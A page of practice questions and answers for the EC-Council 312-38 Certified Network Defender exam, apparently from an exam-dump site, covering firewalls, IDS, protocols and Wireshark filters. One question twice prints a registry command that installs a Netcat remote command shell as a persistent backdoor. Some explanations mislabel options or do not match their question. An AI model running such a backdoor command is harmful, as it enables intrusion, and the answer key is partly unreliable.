[2024] 312-38 PDF Questions - Perfect Prospect To Go With ActualPDF Practice Exam [Q122-Q141]

Share

[2024] 312-38 PDF Questions - Perfect Prospect To Go With ActualPDF Practice Exam

EC-COUNCIL 312-38 Pdf Questions - Outstanding Practice To your Exam

NEW QUESTION # 122
Jason has set a firewall policy that allows only a specific list of network services and deny everything else. This strategy is known as a____________.

  • A. Default allow
  • B. Default access
  • C. Default restrict
  • D. Default deny

Answer: D

Explanation:
The strategy Jason has set up is known as a Default Deny policy. This approach to network security is designed to block all access by default, only allowing services that are explicitly permitted. This is a more secure posture compared to the Default Allow policy, which allows all traffic unless it is specifically blocked. The Default Deny strategy aligns with the principle of least privilege, ensuring that only the minimum necessary access is granted, thereby reducing the attack surface and potential for unauthorized access.


NEW QUESTION # 123
Mark is monitoring the network traffic on his organization's network. He wants to detect TCP and UDP ping sweeps on his network. Which type of filter will be used to detect this?

  • A. tcp.srcport==7 and udp.srcport==7
  • B. tcp.dstport==7 and udp.srcport==7
  • C. tcp.dstport==7 and udp.dstport==7
  • D. tcp.srcport==7 and udp.dstport==7

Answer: C


NEW QUESTION # 124
You run the following command on the remote Windows server 2003 computer:
c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\nc.exe -d
192.168.1.7 4444 -e
cmd.exe"
What task do you want to perform by running this command? Each correct answer represents a complete
solution. Choose all that apply.

  • A. You want to put Netcat in the stealth mode.
  • B. You want to perform banner grabbing.
  • C. You want to add the Netcat command to the Windows registry.
  • D. You want to set the Netcat to execute command any time.

Answer: A,C,D

Explanation:
According to the question, you run the following command on the remote Windows server 2003 computer:
c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\nc.exe -d
192.168.1.7 4444 -e
cmd.exe"
By running this command, you want to perform the following tasks:
Adding the NetCat command in the following registry value:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Putting the Netcat in the stealth mode by using the -d switch. Setting the Netcat tool to execute command at
any time by using the -e switch.
Answer option A is incorrect. You can perform banner grabbing by simply running the nc <host> <port>.


NEW QUESTION # 125
Which of the following statements are true about security risks? Each correct answer represents a complete solution. (Choose three.)

  • A. They can be analyzed and measured by the risk analysis process.
  • B. They are considered an indicator of threats coupled with vulnerability.
  • C. They can be mitigated by reviewing and taking responsible actions based on possible risks.
  • D. They can be removed completely by taking proper actions.

Answer: A,B,C

Explanation:
In information security, security risks are considered an indicator of threats coupled with vulnerability. In other words, security risk is a probabilistic function of a given threat agent exercising a particular vulnerability and the impact of that risk on the organization. Security risks can be mitigated by reviewing and taking responsible actions based on possible risks. These risks can be analyzed and measured by the risk analysis process.
Answer option B is incorrect. Security risks can never be removed completely but can be mitigated by taking proper actions.


NEW QUESTION # 126
A local bank wants to protect their card holder data. The bank should comply with the________standard to ensure the security of card holder data.

  • A. HIPAA
  • B. ISEC
  • C. PCI DSS
  • D. SOAX

Answer: C

Explanation:
The Payment Card Industry Data Security Standard (PCI DSS) is the global data security standard adopted by the payment card brands for all entities that process, store, or transmit cardholder data. It consists of steps that mirror security best practices, including protecting stored cardholder data, maintaining a vulnerability management program, and implementing strong access control measures. For a local bank that wants to protect cardholder data, compliance with PCI DSS is essential to ensure the security of this sensitive information.
References: The PCI DSS Quick Reference Guide and other official documents from the PCI Security Standards Council provide comprehensive information on the requirements and best practices for securing cardholder data. These documents are used as references in the EC-Council's Certified Network Defender (CND) course to educate network defenders on the importance of PCI DSS compliance12.


NEW QUESTION # 127
Fill in the blank with the appropriate term. The _____________is an application layer protocol that is used between workstations and routers for transporting SNA/NetBIOS traffic over TCP sessions.

Answer:

Explanation:
DCAP


NEW QUESTION # 128
John wants to implement a firewall service that works at the session layer of the OSI model. The firewall must also have the ability to hide the private network information. Which type of firewall service is John thinking of implementing?

  • A. Circuit level gateway
  • B. Packet Filtering
  • C. Stateful Multilayer Inspection
  • D. Application level gateway

Answer: A

Explanation:
A circuit level gateway operates at the session layer of the OSI model, which is responsible for establishing, maintaining, and terminating connections between network nodes. It is designed to provide security by verifying the Transmission Control Protocol (TCP) handshaking between packets to ensure that the session is legitimate and by monitoring the state of the connection. Unlike application-level gateways, circuit level gateways do not inspect the packet's contents but rather the header information to ensure that the traffic conforms to the established rules. This type of firewall is particularly effective at hiding the private network information because it only allows traffic from established sessions and does not expose the details of the network's internal structure.


NEW QUESTION # 129
Which of the following is a network layer protocol used to obtain an IP address for a given hardware (MAC) address?

  • A. IP
  • B. RARP
  • C. ARP
  • D. PIM

Answer: B

Explanation:
Reverse Address Resolution Protocol (RARP) is a Network layer protocol used to obtain an IP address for a given hardware (MAC) address. RARP is sort of the reverse of an ARP. Common protocols that use RARP are BOOTP and DHCP.
Answer option D is incorrect. Address Resolution Protocol (ARP) is a network maintenance protocol of the TCP/IP protocol suite. It is responsible for the resolution of IP addresses to media access control (MAC) addresses of a network interface card (NIC). The ARP cache is used to maintain a correlation between a MAC address and its corresponding IP address. ARP provides the protocol rules for making this correlation and providing address conversion in both directions. ARP is limited to physical network systems that support broadcast packets.
Answer option B is incorrect. Protocol-Independent Multicast (PIM) is a family of multicast routing protocols for Internet Protocol (IP) networks that provide one-to-many and many-to-many distribution of data over a LAN, WAN, or the Internet. It is termed protocol-independent because PIM does not include its own topology discovery mechanism, but instead uses routing information supplied by other traditional routing protocols, such as Border Gateway Protocol (BGP).
Answer option A is incorrect. The Internet Protocol (IP) is a protocol used for communicating data across a packet-switched inter-network using the Internet Protocol Suite, also referred to as TCP/IP.
IP is the primary protocol in the Internet Layer of the Internet Protocol Suite and has the task of delivering distinguished protocol datagrams (packets) from the source host to the destination host solely based on their addresses. For this purpose, the Internet Protocol defines addressing methods and structures for datagram encapsulation. The first major version of addressing structure, now referred to as Internet Protocol Version 4 (IPv4), is still the dominant protocol of the Internet, although the successor, Internet Protocol Version 6 (IPv6), is being deployed actively worldwide.


NEW QUESTION # 130
Rick has implemented several firewalls and IDS systems across his enterprise network. What should he do to effectively correlate all incidents that pass through these security controls?

  • A. Use firewalls in Network Address Transition (NAT) mode
  • B. Implement Simple Network Management Protocol (SNMP)
  • C. Implement IPsec
  • D. Use Network Time Protocol (NTP)

Answer: D

Explanation:
To effectively correlate incidents across various security controls like firewalls and IDS systems, it is essential to ensure that the timestamps of logs and events are synchronized. This is where Network Time Protocol (NTP) comes into play. NTP ensures that all devices on the network are on the same time setting, which is crucial for event correlation. Without synchronized time settings, it would be challenging to establish a timeline of events and understand the sequence in which they occurred, making incident response and forensic analysis more difficult.
References: The importance of using NTP for incident correlation is well-documented in network security best practices and is also highlighted in the EC-Council's Certified Network Defender (CND) course materials. The CND course emphasizes the role of NTP in maintaining accurate time stamps across network devices for effective security incident management and analysis.


NEW QUESTION # 131
Sophie has been working as a Windows network administrator at an MNC over the past 7 years. She wants to check whether SMB1 is enabled or disabled. Which of the following command allows Sophie to do so?

  • A. Get-WindowsOptionalFeatures -Online -FeatureName SMB1Protocol
  • B. Get-WindowsOptionalFeatures -Online -FeatureNames SMB1Protocol
  • C. Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
  • D. Get-WindowsOptionalFeature -Online -FeatureNames SMB1Protocol

Answer: C

Explanation:
To check if SMB1 is enabled or disabled, the correct PowerShell command is Get-WindowsOptionalFeature
-Online -FeatureName SMB1Protocol. This command queries the status of the SMB1Protocol feature in the running instance of Windows. If SMB1 is enabled, the command will return its status as 'Enabled', and if it is disabled, it will return 'Disabled'.
References: The correct syntax for the command is documented in various official Windows resources, including Microsoft's own documentation on managing SMB protocols1. It is also aligned with the objectives of the EC-Council's Certified Network Defender (CND) program, which includes knowledge of managing Windows network protocols and features.


NEW QUESTION # 132
Sam, a network administrator is using Wireshark to monitor the network traffic of the organization. He wants to detect TCP packets with no flag set to check for a specific attack attempt. Which filter will he use to view the traffic?

  • A. Tcp.flags==0000x
  • B. Tcp.flags==x0000
  • C. Tcp.flags==000x0
  • D. Tcp.flags==0x000

Answer: D


NEW QUESTION # 133
A local bank wants to protect their card holder dat
a. The bank should comply with the________standard to ensure the security of card holder data.

  • A. HIPAA
  • B. ISEC
  • C. PCI DSS
  • D. SOAX

Answer: C

Explanation:
The Payment Card Industry Data Security Standard (PCI DSS) is the global data security standard adopted by the payment card brands for all entities that process, store, or transmit cardholder data. It consists of steps that mirror security best practices, including protecting stored cardholder data, maintaining a vulnerability management program, and implementing strong access control measures. For a local bank that wants to protect cardholder data, compliance with PCI DSS is essential to ensure the security of this sensitive information.


NEW QUESTION # 134
Which of the following statement holds true in terms of containers?

  • A. Process-level isolation happens; a container in hence less secure
  • B. Container requires more memory space
  • C. Each container runs in its own OS
  • D. Container is fully isolated; hence, more secure

Answer: A

Explanation:
Containers are designed to be lightweight, running directly within the host's kernel without the need for a guest operating system. This means they share the same OS kernel but maintain separate user spaces. While this architecture provides process-level isolation, it does not offer the same level of security as a fully isolated virtual machine (VM). VMs include a full copy of an operating system, a virtual copy of the hardware that the OS requires to run, and provide complete isolation from the host system. Containers, on the other hand, are less secure because if the host OS is compromised, all containers could potentially be compromised. The Certified Network Defender (CND) program emphasizes understanding the security implications of different technologies, including containers, and the importance of implementing appropriate security measures to protect network resources123.
References: The information provided here is aligned with the EC-Council's Certified Network Defender (CND) curriculum, which covers network security, defense strategies, and the differences between containers and VMs in terms of security45. For more detailed information, please refer to the official CND study materials and documents provided by the EC-Council.


NEW QUESTION # 135
Which of the following examines network traffic to identify threats that generate unusual traffic flows, such as distributed denial of service (DDoS) attacks, certain forms of malware, and policy violations?

  • A. Network-based Intrusion Prevention
  • B. Host-based Intrusion Prevention
  • C. Wireless Intrusion Prevention System
  • D. Network Behavior Analysis

Answer: D

Explanation:
Network Behavior Analysis examines network traffic to identify threats that generate unusual traffic flows, such as distributed denial of service (DDoS) attacks, certain forms of malware, and policy violations.
Answer option B is incorrect. Network-based Intrusion Prevention (NIPS) monitors the entire network for suspicious traffic by analyzing protocol activity.
Answer option C is incorrect. Wireless Intrusion Prevention System (WIPS) monitors a wireless network for suspicious traffic by analyzing wireless networking protocols.
Answer option D is incorrect. Host-based Intrusion Prevention (HIPS) is an installed software package that monitors a single host for suspicious activity by analyzing events occurring within that host.


NEW QUESTION # 136
What is the correct order of activities that a IDS is supposed to attempt in order to detect an intrusion?

  • A. Prevention, Intrusion Monitoring, Intrusion Detection, Response
  • B. Intrusion Detection, Response, Prevention, Intrusion Monitoring
  • C. Prevention, Intrusion Detection, Response, Intrusion Monitoring
  • D. Intrusion Monitoring, Intrusion Detection, Response, Prevention

Answer: D

Explanation:
An Intrusion Detection System (IDS) is designed to monitor network or system activities for malicious actions or policy violations. The correct order of activities that an IDS follows to detect an intrusion starts with Intrusion Monitoring, where it observes the network traffic or system events. Following this, Intrusion Detection takes place, where the IDS analyzes the monitored data to identify potential security breaches. Once a potential intrusion is detected, the Response mechanism is activated to address the intrusion, which may include alerts or automatic countermeasures. Finally, Prevention is applied to improve the system's defenses against future intrusions based on the detected patterns and responses.


NEW QUESTION # 137
You are an IT security consultant working on a contract for a large manufacturing company to audit their entire network. After performing all the tests and building your report, you present a number of recommendations to the company and what they should implement to become more secure. One recommendation is to install a network-based device that notifies IT employees whenever malicious or questionable traffic is found. From your talks with the company, you know that they do not want a device that actually drops traffic completely, they only want notification. What type of device are you suggesting?

  • A. You are suggesting a NIPS device
  • B. A NIDS device would work best for the company
  • C. The best solution to cover the needs of this company would be a HIDS device.
  • D. A HIPS device would best suite this company

Answer: B

Explanation:
The device suggested is a Network Intrusion Detection System (NIDS). A NIDS monitors network traffic for suspicious activity and alerts the system or network administrator. Unlike a Network Intrusion Prevention System (NIPS), which actively blocks traffic deemed malicious, a NIDS does not interfere with the flow of traffic, thus fulfilling the company's requirement for a device that only notifies rather than drops traffic.
References: The information aligns with the Certified Network Defender (CND) course's focus on network security, which includes understanding and implementing devices that protect, detect, respond, and predict network security incidents. The CND course emphasizes the importance of network traffic monitoring and analysis, which is a key function of a NIDS12.


NEW QUESTION # 138
Harry has sued the company claiming they made his personal information public on a social networking site in the United States. The company denies the allegations and consulted a/an _______ for legal advice to defend them against this allegation.

  • A. Evidence Manager
  • B. Attorney
  • C. PR Specialist
  • D. Incident Handler

Answer: B

Explanation:
In the context of legal allegations regarding the disclosure of personal information on a social networking site, a company would consult an attorney for legal advice. An attorney is a professional who is qualified to offer legal advice, represent clients in court, and defend them against legal claims. In this scenario, the attorney would help the company understand the legal implications of the allegations, advise on the best course of action, and provide representation if the case goes to court.


NEW QUESTION # 139
Adam, a malicious hacker, has just succeeded in stealing a secure cookie via a XSS attack. He is able to replay the cookie even while the session is valid on the server. Which of the following is the most likely reason of this cause?

  • A. No encryption is applied.
  • B. Encryption is performed at the application layer (single encryption key).
  • C. Encryption is performed at the network layer (layer 1 encryption).
  • D. Two way encryption is applied.

Answer: B

Explanation:
Single key encryption uses a single word or phrase as the key. The same key is used by the sender to encrypt and the receiver to decrypt. Sender and receiver initially need to have a secure way of passing the key from one to the other. With TLS or SSL this would not be possible. Symmetric encryption is a type of encryption that uses a single key to encrypt and decrypt data. Symmetric encryption algorithms are faster than public key encryption. Therefore, it is commonly used when a message sender needs to encrypt a large amount of data.
Data Encryption Standard (DES) uses the symmetric encryption key algorithm to encrypt data.


NEW QUESTION # 140
Martin is a professional hacker. He is performing reconnaissance on an organization to hack a few target systems. As a part of this method, he needs to determine what hosts are available on the network, what services those hosts are offering, what operating systems they are running, what type of packet filters/firewalls, etc. To obtain such information, Martin decided to use automated tools.
Which of the following tool must be employed by Martin?

  • A. Zendio
  • B. Burp Suite
  • C. FOCA
  • D. Nmap

Answer: D

Explanation:
Nmap (Network Mapper) is a security scanner used to discover hosts and services on a computer network, thus building a "map" of the network. It is designed to scan large networks rapidly, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It is highly flexible, allowing for a wide range of advanced techniques, such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Therefore, for the reconnaissance purposes described in the question, Nmap is the appropriate tool for Martin to employ.


NEW QUESTION # 141
......

Online Questions - Outstanding Practice To your 312-38 Exam: https://www.actualpdf.com/312-38_exam-dumps.html

Practice To 312-38 - ActualPDF Remarkable Practice On your EC-Council Certified Network Defender CND Exam: https://drive.google.com/open?id=1fWZyJfh699zRWnDq55Myi_oXJjfU72cV